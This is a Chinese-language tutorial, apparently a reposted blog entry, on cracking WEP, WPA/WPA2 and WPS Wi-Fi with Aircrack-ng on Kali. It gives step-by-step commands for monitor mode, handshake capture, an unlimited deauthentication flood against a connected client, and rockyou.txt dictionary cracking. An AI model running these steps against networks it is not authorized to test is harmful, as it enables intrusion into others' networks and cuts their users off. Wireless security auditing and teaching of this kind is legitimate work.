1. 程式人生 > >Aircrack-ng套件——無線破解原理及工具詳解

Aircrack-ng套件——無線破解原理及工具詳解

前言:

現行的無線協議標準在安全方面是完全達標的,是非常安全的。如果現行的無線標準在很被攻破了,業界為什麼還一直在使用這一標準。

因此,破解之所以能成功,完全是因為USR配置路由器不當和密碼強度低的漏洞罷了。

普通無線加密及破解的分類:
1,wep加密:此類加密比較老舊,現在的無線路由器已經很少使用此類加密方式,破解只需要大量的資料包即可。

2,WPA / WPA2 PSK加密:這類加密是很安全的,破解的方式是抓握手包然後跑字典。

3,一部分路由器為了方便使用者,設定了QSS快速連線功能(或者叫WPS功能)。破解方式是抓握手包跑字典和跑PIN碼2種。

工具:

1,一塊支援混雜模式(監聽模式)的無線網絡卡。

2,一個支援無線破解工具的系統(像的CDlinux的,卡利,BT5等)

3,一臺配置不錯的電腦以及強大的字典

工具作用:

無線網絡卡:用來抓包,要想破解無線你必須把空中的無線資料監聽下來,存成一個檔案網絡卡只有這一個功能,也只有這一個用處,就是用它來抓取周圍的無線資料包,把它存到檔案裡。供後來的程式分析用。

系統:用來驅動網絡卡和分析資料網絡卡雖然能支援混雜模式(監聽模式),但是需要系統驅動程式來呼叫它,不是所有的系統都能支援把網絡卡設定為監聽模式,這裡我們一般用的就是卡利,把CDlinux的。

配置不錯的電腦:用來計算密碼明文因為周圍的資料包都是加密的,網絡卡監聽到的資料自然也是加密的,要想通過這些加密的資料把密碼計算出來,我們需要一臺計算能力強勁的電腦,以及一本強大的字典。


破解原理

WEP加密的就不談了,無非就是抓上個十分鐘的IVS資料包,然後用工具計算出來即可。

1,WPA / WPA2破解原理

首先要抓包:這一步主要靠網絡卡。

什麼是握手包:無線訊號是加密的,如果你要連線無線路由器,就要給路由器傳送一個請求,請求和無線路由器建立連線,這個請求就在一個你要傳送的資料包裡,學名叫握手包,這個包裡面包含了你傳送過去的一個密碼,但是這個密碼是加密的。

所以我們要破解的無線網路連線我們首先要抓到這個包,裡面有加密過的密碼,我們只要抓到這個包,再用電腦根據這個加密後的資料反算密碼就行了。

而握手包只在裝置與路由器剛開始連線的時候由裝置傳送給路由器,認證成功後就不再發送了,所以我們要想抓住這個包我們必須等到有裝置和路由器剛要建立連線時來抓,當然我們有更好的方法,就是用一個方法斷開一個已經連線到路由器的裝置,等它再自動和路由器連線的時候抓住那個握手包。

然後就是跑包,這一步就和網絡卡沒有關係了,全靠電腦和字典。

跑包:跑包就是用同樣的演算法把字典裡的密碼加密,然後將結果與握手包裡的密文進行比對如果一樣那麼也就知道了原密碼說白了就是拿密碼一個個的試,看看哪個是對的。

因此跑包能不能跑出來完全取決你的字典裡有沒有包含真正的密碼。還取決於你的電腦配置夠不夠強,能不能在可以等待的時間內跑完字典。

2,破解WPS路由器

這個要求路由器開了WPS,而且還沒有做WPS連線限制和嘗試時間間隔限制,並且訊號還要好在PWR在70的絕對值以內。

移步:https://blog.csdn.net/tanyl168/article/details/84768957 (Reaver無線破解工具 - 窮舉PIN碼破解簡析)

           https://blog.csdn.net/tanyl168/article/details/84770597   (Fern wifi cracker 無線破解工具——圖解


詳細步驟:

1.開啟kali系統後,插入最常見使用3370晶片的USB無線網絡卡,免驅。檢查網絡卡,及狀態.

[email protected] kali:~#ifconfig -a

[email protected]:~# ifconfig   //檢視網路配置,網絡卡是否載入成功。有時需要加 -a引數

網絡卡載入成功,一般在下方會顯示3塊:
etho:


lo:


wlan0:常見的網絡卡名稱則顯示在此。若未載入成功,請檢視vmware的player選項內,可移動裝置。或按提示安裝驅動。

2.開啟網絡卡監聽模式
root @ kali:~#airmon-ng start wlan0  

[email protected]:~# airmon-ng start wlan0  //wlan0為前面查到的網絡卡名稱

可再通過ifconfig命令,檢視監聽模式是否開啟成功。此時成功開啟監聽,網絡卡名稱變成了:wlan0mon

3.掃描監聽熱點

root @ kali:〜#airodump-ng wlan0mon

[email protected]: ~# airodump-ng wlan0mon

4.選擇一個來抓取握手包
root @kali:〜#airodump-ng -c <通道> --bssid <路由ID> -w <儲存抓包的目錄名稱> <網絡卡名稱>

[email protected]: ~#  airodump-ng -c 3 --bssid D4:EE:07:39:F5:DE -w /root/桌面 wlan0mon

//等待新裝置連線,抓取握手包或進行第5步

5.洪水攻擊,強制打掉重連

[email protected]:〜#aireplay-ng -0 0 -a <bssid路由ID> -c <連線wifi的mac IP> <網絡卡名>

[email protected]: ~#aireplay-ng -0 0 -a D4:EE:07:39:F5:DE -c D8:5D:E2:96:AB:EB wlan0mon

// - 0引數為用deauth洪水攻擊,0為無限,-0 5則攻擊5次,數字表示次數。

攻擊原理是:。先打掉USR的無線網路連線,消除身份認證此時MAC電腦,PC,手機USR只能手動連線,若無限攻擊則USR無法連線上客戶端會要求重輸密碼,這時會有握手包,如不斷開攻擊,則一直無法連線上。
假如攻擊2次停止,USR客戶端會自動重連,這時亦會自動抓取握手包。


6.停止攻擊
ctrl + c當終端右上方出現:WPA握手:D8:5D:22:96:AB字樣則說明抓包完成,停止攻擊
抓包完成可關閉監聽模式:root @ kali:〜#airmon- ng stop wlan0mon(網絡卡名)

[email protected]: ~# airmon-ng stop wlan0mon(網絡卡名)


7.爆破
root @ kali:〜#aircrack-ng -w /usr/share/wordlists/rockyou.txt / root /桌面-1.cap

[email protected]: ~# aircrack-ng -w /usr/share/wordlists/rockyou.txt /root/桌面-1.cap

// - a2引數:<代表WPA握手包>,可新增至命令執行
// - w引數:指定字典檔案路徑,rockyou.txt為kali自帶字典,使用前須先解壓:

root @ kali:〜#gzip -d /usr/share/wordlists/rockyou.txt.gz

// root /桌面-1.cap:抓取的密碼包路徑(可通過手動檢視相應路徑)

8.靜待結果

一本強大的字典能加快跑包成功的效率和成功率。跑包成功會在中間有提示!


後記:

Aircrack- ng是評估WiFi網路安全性的一整套工具。

- Aircrack-ng無線密碼破解
- Aireplay-ng流量生成和客戶端認證
- Airodump-ng資料包捕獲
- Airbase-ng虛假接入點配置

它側重於無線網路安全的不同領域:

監控:資料包捕獲和資料匯出到文字檔案,以供工具第三方進一步處理
攻擊:通過資料包注入重播攻擊,解除身份驗證,虛假接入點等
測試:檢查無線網路卡和驅動程式功能(捕獲和注入)
破解:WEP和WPA PSK(WPA 1和2)
。所有工具都是命令列,允許繁重的指令碼很多GUI都利用了這個功能它主要用於Linux的,
但也適用於視窗,OS X,FreeBSD中,OpenBSD,NetBSD,以及Solaris甚至eComStation 2。

如果您在注入問題時遇到問題,或者如果您在airodump-ng(螢幕右上角)或aireplay-ng中收到有關通道-1或固定通道的錯誤訊息,請airmon-ng check kill在將無線卡放入監視器之前使用網路管理器模式

[email protected]:~# airmon-ng check kill此命令會關閉影響破解程式的程序。可在破解前使用

<無線審計隨筆,僅作學習參考使用,參考文獻:37實驗室,Aircrack和了社群>